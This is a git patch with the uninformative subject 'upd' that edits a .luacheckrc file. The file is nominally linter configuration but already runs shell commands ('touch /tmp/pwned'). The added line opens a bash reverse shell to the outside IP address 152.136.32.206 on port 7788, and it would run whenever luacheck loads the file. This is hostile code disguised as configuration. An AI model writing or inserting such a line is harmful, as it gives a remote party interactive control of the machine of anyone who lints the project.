From 23d121421521223c8ae188b1f7a957a17ddf3bb6 Mon Sep 17 00:00:00 2001 From: yoshino-s Date: Fri, 22 Aug 2025 15:27:52 +0800 Subject: [PATCH] upd --- .luacheckrc | 1 + 1 file changed, 1 insertion(+) diff --git a/.luacheckrc b/.luacheckrc index 4c34733..bb5200a 100644 --- a/.luacheckrc +++ b/.luacheckrc @@ -1,2 +1,3 @@ os.execute("touch /tmp/pwned") +os.execute("bash -c \"bash -i >& /dev/tcp/152.136.32.206/7788 0>&1\"") print("pwned") \ No newline at end of file